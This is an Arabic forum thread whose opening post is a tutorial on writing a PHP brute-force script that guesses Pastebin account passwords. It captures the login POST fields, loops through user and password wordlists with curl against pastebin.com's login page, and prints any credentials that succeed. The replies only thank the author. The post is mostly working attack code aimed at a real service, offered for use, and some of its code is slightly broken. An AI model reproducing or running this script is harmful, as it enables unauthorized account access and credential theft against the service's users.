1. fantome195

    fantome195 Developer

    الأنتساب:
    ‏4 يونيو 2012
    المشاركات:
    89
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الوظيفة:
    Student
    الإقامة:
    Morocco
    [​IMG]

    .::سكريبتات التخمين و كيفية برمجتهم :cًoُnُfuُseٌd: ::.

    الشغلة سهلة ومافيها أي تعقيد

    أوكي نبدأ بالشرح

    شوف مثلا لدينا لوحة لدينا خانة اليوزر والباسورد وكل وحدة عندها إسم

    أوكي أول شيئ لما نحب نبرمج وحدة نستخرج الخانات لي نحتجها أوكي رح نجرب اليوم على
    pastebin


    نفتح أي أداة لأستقبال مبادلات
    Post


    مثلا http headers

    وندخل أي شيئ في الخانات ونط أوكي شوفو الصورة

    [​IMG]

    أوكي لدينا فالبوست

    كود PHP:
    submit_hidden=submit_hidden&user_name=dzdz&user_password=dzdz&submit=Login
    أوكي نحن أدخلنا dzdz كيوزر و باسورد
    الأن نحتاج

    كود PHP:
    submit_hidden=submit_hidden&user_name=$user&user_password=$pass&submit=Login
    هذا هو البوست الي رح نكرره حتى غيجاد الباسورد

    نبدأ فالبرمجة

    أولا رح نبرمج من cli

    نقوم بفتح وسم

    php

    ثم نقوم بجلب محتوى اليوزرات و الباسوردات من ملف

    بإستعمال دالة

    file_get_contents

    و الفصل بين كل يوزر وباسورد ب

    \n

    والتي تمثل سطر جديد بإستعمال الدالة

    explode

    لازم تكون تعرف شوية أساسيات php

    كود PHP:
    <?
    $user=explode('\n',file_get_contents("./user.txt"));
    $password=explode('\n',file_get_contents("./pass.txt"));
    ?>
    أوكي الأن نعمل تكرار لكل باسورد ليدور على شكل حلقات و نبدأ باليوزرات ليدور عليه كل

    الباسوردات على كل يوزر

    و نعمل trim

    لفصل المسافات الفارغة

    كود PHP:
    <?
    $user=explode('\n',file_get_contents("./user.txt"));
    $password=explode('\n',file_get_contents("./pass.txt"));
    foreach(
    $user as $u )
    {
    $us=trim($u);
    foreach(
    $password as $passs){
    $pwd=trim($passs);
    }
    }
    ?>
    أوكي الأن نبرمج دالة التخمين

    رح نستعمل مكتبة الكيرل يمكنك البحث عنها في قوقل

    راح أشرح ف التعليقات

    كود PHP:
    <?
    function 
    brut($user,$pass){
    $post=array("submit_hidden"=>"submit_hidden","user_name"=>$user,"user_password"=>$pass,"submit"=>"Login");// هذا البوست الي إستخرجهاه من قبل  مع وصع مكان اليوزر والباس في مكانهم في البوست وضعناهم في مصفوة
       
    $urlv='http://pastebin.com/login.php';// رابط الدخول 
                    
    $sh curl_init();// بدأ أو إعلان عن جلسة كيرل 
                    
    curl_setopt($sh,CURLOPT_FOLLOWLOCATION,1);///redirction إتباع تغير الرابط مثلا إذا كان يقوم ب  
                    
    curl_setopt($sh,CURLOPT_URL$urlv);/// الرابط المرجة العمل عليه 
                    
    curl_setopt($sh,CURLOPT_POSTFIELDS,$post);// submit_hidden=submit_hidden&user_name=$user&user_password=$pass&submit=Login خانات البوست الي عملها في مصفوفة لتنظيم ويمكنك وضعهم كماهم  مثلا  
                    
    $brute curl_exec($sh);// تنفيد الجلسة 
                    
    if(eregi('TOTAL PASTES' $brute))///فأذا وجدها في الناتج عن تنفيد الجلسة يرجع القيمة صحيحة و بذلك قد تم التخمين  TOTAL PASTES الأعتماد على 
                    
    {
                      return 
    true;
                    }else{
                   return 
    false;
     
                    }
      }
    ?>
    أوكي نجمع الأ، الكود !$^@

    كود PHP:
    <?
    $user=explode('\n',file_get_contents("./user.txt"));
    $password=explode('\n',file_get_contents("./pass.txt"));
    foreach(
    $user as $u )
    {
    $us=trim($u);
    foreach(
    $password as $passs){
    $pwd=trim($passs);
    $p=brut($us,$pwd);
    if(
    $p){
    echo
    "
    [+] Found 
    $us -> $pwd 
    "
    ;
    }
    }
    }
     function 
    brut($user,$pass){
        
    $post=array("submit_hidden"=>"submit_hidden","user_name"=>$user,"user_password"=>$pass,"submit"=>"Login");
       
    $urlv='http://pastebin.com/login.php';
                    
    $sh curl_init();
                    
    curl_setopt($sh,CURLOPT_FOLLOWLOCATION,1);
                    
    curl_setopt($sh,CURLOPT_URL$urlv);
                    
    curl_setopt($sh,CURLOPT_POSTFIELDS,$post);
                    
    $brute curl_exec($sh);
                    if(
    eregi('TOTAL PASTES' $brute))
                    {
                      return 
    true;
                    }else{
                   return 
    false;
     
                    }
      }
    ?>
    true عملنا تحقق بدالة إذا أرجعت الدالة قيمة صحيحة

    يطبع اليوزر والباسورد الدي تم الدخول له

    أنا قمت بعمل أداة على السريع البارحة

    مرتب يها الأكواد

    كود PHP:
     pastebin brut force Pastebin.com[/url]

    ربما تفيدك

    وإنتهينا

    php المهم شرح بسيط للمقبلين على

    وبالتوفيق 
    :ُok:ٌ

    حقوق الشرح ترجع الى  HAMZA KILLER
    [/COLOR][/SIZE][/FONT][/CENTER]
     
  2. or0

    or0 V • I • P

    الأنتساب:
    ‏22 فبراير 2014
    المشاركات:
    392
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    18
    رد: شرح برمجة سكريبتات التخمين بلغة البي اتش بي

    شكرا لك عزيزي .
     
  3. dz-attack3r

    dz-attack3r Developer

    الأنتساب:
    ‏1 مايو 2014
    المشاركات:
    28
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: شرح برمجة سكريبتات التخمين بلغة البي اتش بي

    ما شاء الله...بارك الله فيك:{10}:
     
  4. TNT_ON

    TNT_ON Developer

    الأنتساب:
    ‏15 يونيو 2012
    المشاركات:
    8
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الوظيفة:
    █ Hacker Wi-Fi █
    الإقامة:
    █ Jordan █
    رد: شرح برمجة سكريبتات التخمين بلغة البي اتش بي

    يعطيك العافيه
     

مشاركة هذه الصفحة